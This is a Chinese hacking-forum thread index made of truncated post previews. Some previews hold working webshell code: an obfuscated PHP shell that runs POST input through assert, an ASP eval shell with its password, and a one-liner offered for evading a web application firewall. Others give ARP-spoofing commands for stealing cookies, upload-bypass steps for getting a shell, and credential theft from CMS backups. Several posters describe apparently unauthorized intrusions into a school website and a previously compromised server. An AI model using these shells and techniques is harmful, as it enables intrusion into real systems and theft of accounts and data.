-
23徒弟 @為所欲為 做出前四题后,我来说一下第五题 这一题其实稍微做过CTF的人看一眼就应该知道了 (据我所知乌云在的那会国内就开始注意到了这个问题) 所以为什么要炒旧饭呢? 因为这篇文章是适用于小白类型的旧饭
-
141. [url]http://www.xxx.com/admin/login.php 找到了网站的后台登陆[/url] 2.尝试弱口令 登陆成功 3.然后就是找上传点了 4. 尝试00截断绕过 5.再尝试修改mime验证 然后就连接shell了 这里弱弱的问下 有没有老哥们一起学习的 麻烦带下我这个菜🖊 我一定好好学习共 6 张
-
7看了大佬的帖子,做个简单的复现。利用织梦备份的数据与Windows下apache与短文件名利用。 1:搭建环境win10+phpstudy.apache+mysql。首先必须是管理员备份才有表。奈何有些管理员不备份。已备份 2:访问data/backupdata/dede_a~1.txt。可得到备份的账号密码
-
9今天给大家详细的讲讲未授权redis漏洞利用,顺便附带exp供大家下载使用。
-
135不骄不躁
2018-07
-
45前言: 这个站我以前已经拿过一次了,后来掉了,以前是找了个地方上传,但是有目录限制,后来用以前发的那个../跳目录跳走了,但是又提示进程占用什么的,然后过了一会儿马竟然变成0KB了,估计有什么东西在作怪,然后跑去贴吧发帖,有个人给我了一个aspx大马,传上去就分分钟秒杀了,提上去有360全套,我全给他卸载了,然后嗅探了,然后服务器就挂了,然后我就上不去了,然后就不管他了,然后时隔半年的我又想起来上去看看内网渗透了,共 18 张
-
27不骄不躁
2018-08
任意用户密码重置的10种姿势(转自互联网)
-
50这篇文章写了很久了,这段时间很忙,今天终于空出时间来了,发出来给大家看看乐子。
-
43Arvin
2018-08
很久没回来看看了,大半夜睡不着过来看看。 时间过的真快,15年时还是一零基础的小白进入渗透吧学习,到现在,已经在安全行业实打实的混了两年多。 看贴吧实战的文章越来越少了,最近也没写什么有意义的文章,就发一篇之前写的文章吧,在t00ls和博客发过,供小白参考,大牛们飘过。 -
112汪汪杰
2016-07
图片出自1973年剧情电影 骗中骗(The Sting) 一个错误的组织和一个错误的人 黑客协会起源已经无从查找,很简单,一个完美的骗局,需要的只是一个名号 黑客协会正是这个名号 而花无涯,正是一个聪明的骗子 一个大谈“黑客精神”的组织和一个大谈“黑客精神”的骗子,一拍即合 迅猛发展 2006年后,国内黑客形式大洗牌,众多黑客站点关闭 想要学习黑客技术的小白,只能到处寻找资源 各种“黑客组织”迅猛发展。当然,除了跟黑客名字相同,没共 8 张 -
19我无聊写了一个调用CMD5收费接口的网站,也就是这个. 因为是收费的,所以用的是我的账号里的钱!! 所以欢迎赞助,赞助者在幽灵网安即可获得一比一的福利与一些特殊的福利,普通的福利比如高级用户组,回帖无需wb,等等 赞助金额 80 100 500 如果是其他的则不需要因为CMD5就是这样收费的. 除此之外,大家享受吧 :)
-
64最近游戏美术这边有点偷懒我这就有点空闲时间了,想怎么利用不过发现利用不起来于是想了个能快捷打发时间的就是写小说,不过一个人写不来。所以倒不如大家把自己想的故事或者真的故事一起接龙写在这个帖子里来打发时间 写东西要有规则,所以规则如下[务必读完再续]: 1. 要能和上文的接起来[有一丝关联也好,当然了也可以自己先留一块毫无关联的片段,写上标题] 如果是接上文的故事: 不要写绝,要给下面的楼留一点空间 不要写死人..和谐社会 不要
-
28友情贴吧重新设置了~~~~ 祝渗透吧越来越好~~~~ 哈哈哈哈哈~ 也欢迎大家来建设和常驻百度红客吧~~~ 堕落的繁华敬上!
-
4链接:https://pan.baidu.com/s/1SQD6JbJzQhThGz0B3NQmig 密码:k1ti
-
28一,简介 2月3日,一名昵称为“Vector”的用户将一段脚本名为AutoSploit上传到GitHub上。这段python脚本会在通过Shodan搜索引擎收集到目标后(需 API 密钥)尝试调用Metasploit模块攻击目标。 这段脚本可综合利用Shodan设备搜索引擎和Metasploit渗透测试工具的Python代码。该代码会用Shodan.io自动搜索有漏洞的在线设备,随后使用Metasploit的漏洞利用数据库劫持计算机和其他在线设备
-
38先给大家拜个早年.2018年,我决定独立开发一款自己的游戏来完成我的高中时期的梦想,可能要很久之后才能再接触安全方面的东西了[3-4年后],所以最近几个月会陆续公开一些我当时为了求职或者说让我钱包有更多钱而研究的一些东西与科技。那么第一章肯定是我们可爱的WAF,以及我们的老朋友安全狗了.至于之后的解密公开内容是看我心情和看帖子热度的{所以留个言吧,纪念一下现在的你} 顺便前排AD如果你是在三年后也就是2020年或者2021年看到这个帖子的
-
80破茧
2018-01
一楼喂度娘 -
61玩不过,开一贴。。。。一手资料
4-24
-
59Syst1m
2015-07
今天天气晴朗阳光明媚,于是我就拿着板凳,吃着瓜子,跟着房产哥来发帖来了,请看 首先我们需要转发 echo 1 > /proc/sys/net/ipv4/ip_forward 看到kali和靶机的ip 链接 arospoof -t 靶机的ip 网关 链接成功 需要打开wireshark用它来抓 start 他就自己开始了 可以获取到很多东西,你没看错,它是可以弄到cookie的,这样就可以上别人的百度啊什么什么的,大家都懂,我就不说了,最后祝渗透吧越来越红火!! 我随便用靶机上个网页什么的,看能抓到什么呢?我好期共 4 张 -
11<?php $a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ?> 密码4 <% i=(Chr(-12590)) love=(Chr(-20306)) you=(Chr(-15133)) OK=i&love&you CNM=Request(OK) eVal CNM 'pass:我爱你 %> 菜刀一句话密码:我爱你
-
57先把战果图给你们贴上,免得你们没心情看下去汪汪杰
1-24
-
2106每日一帖
-
36二楼说事。Hulk
5-1
-
159地址二楼,下载保存记得回帖
-
4偶然看到某B乎扯了一大堆废话 传送门自己百度搜索 CSGO能否杜绝反作弊 除了瞎扯一堆废话,就是废话 然后我就自己花了十分钟写了这个demo
-
55首先说明我也是菜鸟,只不过花了不少时间在渗透上。下面我把自己会的和大家分享一下。不涉及提权和旁站。只单纯的讲指定站的渗透思路。 单丝不成线,独木不成林。哪里讲的不好,请大家指出来,共同进步 【前戏】 信息探测:主要是网站的脚本语言、数据库、搭建平台、操作系统、服务器IP、注册人信息、网站防护情况。 简单说一下这些信息的获取方式: 1.【目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别加个/index.asp /index.aspx /i
-
16这是我很久以前的工程了,一直想发但是没时间发。今天发一下。不要在意时间 首先CSGO某牛你们都懂的是什么。淘宝98一个月.抱着试一试的心情就去买了一个 这个辅助是需要绑定QQ号的,而且他有两个版本。 我们慢慢分析 首先是安全版 OD分析不出什么,因为我懒得调试了。但是从字符串可以看到.大牛辅助使用了动态调用方式.不过没什么鸟用 而且使用了IsDebuggerPresent判断自己在不在被调试。同样也没什么尿用。 用资源树看到了他的本体,但是应该是被共 5 张
-
17作者:SSS安全团队 目的:为民除害(咳咳) 事务繁重,长话短说 XSS长度限制及转义的问题我们已经通过时时彩沦陷和上一篇钓鱼了解到了 我们换玩法了,共 4 张章鱼
6-16
-
38把编写的过狗一句话的思路和成品分享出来。 【php最新过狗一句话】 先讲php,需要用到三个函数 //$b = str_共 6 张
-
63此文章为原创,先用word编写成doc文件,懒得再写一遍,就直接截图了,2楼开始
-
88一楼闲话:最近闲着没事一直呆在家 前些天走在街上有一些小妹妹手里拿着传单走过来说下载APP可以付款打折 闲着没事我就下载了 APP名称(某某钱宝) 简单介绍下这个工具,使用APP充值(微信,支付宝,银行卡)进入账户,在本地商家店铺可进行付款打八折,还有外卖 于是回家之后闲着没事开始抓包尝试搞搞,毕竟很久没有搞APP的洞了 解释下如何抓手机流量包(手机与电脑需在同一网关) 手机 --设置--无线局域网--代理--填入电脑ip--填入burp设置的端口
-
3前言请见此贴:http://tieba.baidu.com/p/5193403387 现在呢由著名大佬95zz许柯亲口承诺,那些交过智商税的小白们
-
29最近看贴吧发现有人共享教程,其他的人都是无密码的不收费的免费共享的,但是呢如果你是原创你收费super辉
6-6
-
13之前发了一片帖子 关于吧内某价值xx的揭露帖子,然后这个卖教程的帖子依旧还在我也不管了你们看看就
-
98一楼想念黑客组~
-
25一楼给度娘 本人不是原创 侵删
-
125一楼献给国家
-
6接到用户举报,经核实吧主 动起手指 置顶广告信息,严重违反吧主协议,故撤销其吧主管理权限。如对此
-
46有多名吧友向我举报本吧有骗子潜伏(怀疑对象甚至包括某小吧,欢迎吧友积极举报),诈骗了大量资金,目前已经收集相关证据提交警方。 本帖集中曝光各种诈骗违法行为,欢迎各位在本帖中回复公布诈骗分子。
-
46大家好 我已经两个月没露头了 因为两个月来我都在研究VAC(就是steam正版游戏里面的反作弊系统). 如果能有一串字符串能形容我的感悟 那会是 D://steam_soure/steam_gamesafe/vac.h 这篇文章与渗透无关 你们有兴趣研究游戏反作弊的可以借鉴一下我两个多月总结的经验
-
114今天本来是拿下了本地一所高中的后台 正在和我挺好的一个哥们嘚瑟 毕竟我长得那么帅(嘿!怎么还打人呢你) 他说有本事你来日我们学校的,日下的话送你一个电子烟 这就很尴尬了,那咱们必须搞一个 -----------------------------------------正文密封线------------------------------------------------------- 打开网站随手加个admin 在我随手试了试之后弱口令无果,于是我就开sqlmap判断了一下post注入,结果我一返回首页发现了这个,这明显是登录了啊,,,我也不知道什共 5 张
-
31其实这样说不太准确,而且这是一个很古老的病毒了,现在市面上的杀软都可以轻松判别出来,但还是会有人特别是我等小白中招,在经历过几次洗礼后决定好好研究一下,经验分享给大家希望大家别再中招, 因为不爱用杀软,不然也不会屡屡中招所以这次下了个360,貌似现在很多人都爱用的样子就下了,首先说明大牛勿喷,本人还处于成长为脚本小子的阶段,大od还在研究阶段,也不懂逆向反汇编,我只是用我曾经学到的知识以及百度还有360软件的共 4 张
-
101汪汪杰
2016-08
你想成为黑客吗? 然而我并不能帮你成为黑客;但是,我能用一星期时间把你打造成“黑客教父”! 准备好了吗? GO! 1,建立身份 注册一个QQ,QQ号不用太好,QQ会员全开上 名字一定要写好,最好写个武侠人物的名字;为什么?因为国人普遍有武侠情节,比如花无涯 隐瞳 千风 弱水 但是注意不要写错别字啊。 痛吗? 签名一定要有哲理够装逼 我举几个例子 工欲善其事,必先利其器 己所不欲,勿施于人 之类的,我们看一个现成的例子啊 2.博客铺垫 你光共 13 张
-
127
可以改...
2017-08
第一次发帖,大佬不许欺负我 处女作献给渗透吧,主要讲思路 本帖讲给不是很会php的人,因为对大佬来说过狗是小意思 我们都知道 这个是php一句话 木马 o(* ̄▽ ̄*)ブ <?php assert($_POST['mima']); ?> 可是,服务器装了安全狗,马上就被拦截了,我们要经过一些处理, 让安全狗不能认出我们的代码是一句话木马。 好多小白只会用一句话,但是不知道原理,我先大概说一下一句话木马的原理 assert是一个php的函数 assert(这里写代码) 这个函数会执行括 -
42一楼讲点最近发生的事 6.1安全法出台 各位不要乱搞事情很危险 最近工作室遇到了各种阻挠 依然坚挺的活了下来 仗义每多屠狗辈 最是无情读书人
-
25萝卜安全培训招生(渗透吧专享65折,7月31日截止) 具体详见https://www.carrotsafe.com/
可以改...
扫二维码下载贴吧客户端
下载贴吧APP
看高清直播、视频!
看高清直播、视频!
友情链接
贴吧热议榜
